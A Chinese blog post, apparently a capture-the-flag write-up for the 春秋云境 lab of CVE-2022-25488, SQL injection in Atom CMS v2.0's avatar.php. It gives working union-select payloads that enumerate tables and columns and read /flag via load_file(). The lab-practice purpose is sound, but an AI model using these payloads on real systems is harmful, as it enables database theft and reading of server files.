春秋云境CVE-2022-25488

最新推荐文章于 2024-05-06 15:38:56 发布
最新推荐文章于 2024-05-06 15:38:56 发布
阅读量641 收藏 8
点赞数 23
分类专栏: 春秋云境 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64432806/article/details/136888887
版权

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面

正文

首选我们进入这个靶场,直接就是迎头暴击。开局就是not found吗?我还以为是我的问题,退出重进还重置了靶场,才发现这就是首页。

因为靶场启动界面就提示我们是/admin/ajax/avatar.php存在注入,那么我就先来访问一下admin试试看。结果直接跳转到登录界面,好家伙直接来波admin/admin试试看。结果试了半天f12也看了半天才发现,这玩意根本就是一个假的,忽悠人的。

既然这个没用那么我们就直接/admin/ajax去看看有些什么目录吧,不玩这些花里胡哨的东西了。来到ajax目录下,我们直接就找到存在注入的这个网页了。

点击进去发现什么也没有,访问源码发现也没什么太多东西。就给了一个/uploads的路径,那么就去访问一下这个路径看看有没有什么有用的信息吧。我们现在也不知道参数是什么,也注入不了

访问一圈回来,发现就只是一个图片罢了,没用什么有用的信息

找到注入点的参数

回到ajax来,访问其他几个网页,我们在最后两个网页上很明显的看到它的参数是id,那么就可以直接大胆猜测一下,这里的参数都是id。

那么回到/admin/ajax/avatar.php界面把参数id=1输入进去后我们很明显的就发现有变化了,既然有了变化我们就找到注入点了。

判断闭合

我们先来判断一下它的闭合方式,单双引号护法出击,打了一圈发现都报错了,那就直接

1’ and 1=1--+发现没问题,那么就直接开始判断数据库有几列数据。

1’ order by 1--+判断出来只有一个,那么接下来我们直接联合注入

?id=-1 union select databse()--+

注意我这里输入的参数是-1的原因是因为我们需要输入一个不存在的参数这样才会把数据库名报错出来。

获取表名

view-source:http://eci-2ze89kh4pw0luobn2r6y.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=-1 union select group_concat(table_name)from information_schema.tables where table_schema='atomcms'--+

获取列名

然后获取这几个表下的列名

view-source:http://eci-2ze89kh4pw0luobn2r6y.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=-1 union select group_concat(column_name)from information_schema.columns where table_schema='atomcms' and table_name='pages'--+

最后找了一圈发现都没用flag影子,那没办法了。只能通过

view-source:http://eci-2ze89kh4pw0luobn2r6y.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=-1+union+(select+load_file('/flag'))--+

获取flag

靶场成功拿下。

扩展

当我们通过注入进去后找不到flag,那么就可以得出结论flag没用藏在数据库里面,它被放在一个单独的文件里面了,那么我们就可以靠load_file()函数来尝试直接读取flag文件。

是花花呢
关注
  • 23
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2022-22965 GUItools单个图形化利用工具
04-06
3月31日,spring 官方通报了 Spring 相关框架存在远程代码执行漏洞,并在 5.3.18 和 5.2.20.RELEASE 中修复了该漏洞。 漏洞评级:严重 影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEASE 的Spring框架均存在该漏洞,建议用户尽快进行排查处置。 缺陷分析 CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
春秋云境CVE-2022-24112
一只爱吃橙子的羊
12-04 2174
CVE-2022-24112:Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
春秋云境CVE-2022-30887
一只爱吃橙子的羊
11-29 3862
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
春秋云境CVE-2022-28060
一只爱吃橙子的羊
11-29 2342
Victor CMS v1.0 /includes/login.php 存在sql注入
春秋云境CVE-2022-24124
一只爱吃橙子的羊
12-02 2326
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
春秋云境CVE-2022-26965
一只爱吃橙子的羊
11-29 2429
Pluck-CMS-Pluck-4.7.16 后台RCE
春秋云境CVE-2022-22963
一只爱吃橙子的羊
01-20 748
SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 题目链接为:http://ip:port P.S 卡慢不影响拿flag
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
春秋云境CVE-2022-23880
一只爱吃橙子的羊
12-06 1365
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
春秋云境CVE-2022-24223
一只爱吃橙子的羊
12-02 1160
AtomCMS SQL注入漏洞
春秋云境CVE-2022-29464
一只爱吃橙子的羊
11-29 1475
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
春秋云境CVE-2022-23134
一只爱吃橙子的羊
12-06 1641
Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix 存在安全漏洞,该漏洞源于在初始设置过程之后,setup.php 文件的某些步骤不仅可以由超级管理员访问,也可以由未经身份验证的用户访问。
Web安全:SQL注入漏洞详解,SQL注入常见功能、危害、分类、判断注入点、注入方式
wangyuxiang946的博客
05-06 921
SQL注入的原理其实很简单:在传给后端的参数中构造SQL语句,改变原有的SQL语法结构,实现对数据库的操作。SQL注入常出现在哪些功能?SQL注入危害,SQL注入分类 ,判断是否存在SQL注入,SQL注入方式
网络安全之OSI七层模型详解
最新发布
m0_65858385的博客
05-06 1014
HTTP--80(使用TCP协议),HTTPS--443(TCP),TELNET远程登录服务--23(TCP),SSH远程登陆“安全性较高,加密认证”--22(TCP),RIP--512(UDP),DNS--域名解析53(TCP和UDP)。3.对数据丢失不敏感。组播:一对多,D类地址:源服务器将资源发送到一个组播组上,当用户需要资源时,访问该组播组并成为组员,然后该组播组将资源复制传递给用户,可以更好的将数据转发和复制给尽可能远的网络节点,减轻资源服务器的负载。MAC地址也叫物理地址,硬件地址,烧录地址。
专家解读 | NIST网络安全框架(1):框架概览
Enlink_Young的博客
05-06 968
当然,在实施CSF过程中,组织对层级的选择和设定也会影响框架配置文件。CSF框架核心由一组适合于各领域关键基础设施部门的网络安全活动、期望结果和参考信息构成,以一种通用的语言描述了适用的网络安全行业标准、指南和实践,以便使从管理层到实施/运营层的利益相关者,能够就网络安全活动和效能进行便捷有效的沟通和交流。CSF是结果驱动型的框架,并且不强制要求组织必须如何实现这些功能,具有不同预算的小型组织或大公司都能够以适合自己的方式实现CSF定义的安全成效,为实施网络安全计划的组织提供了充分的灵活性和扩展性。
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值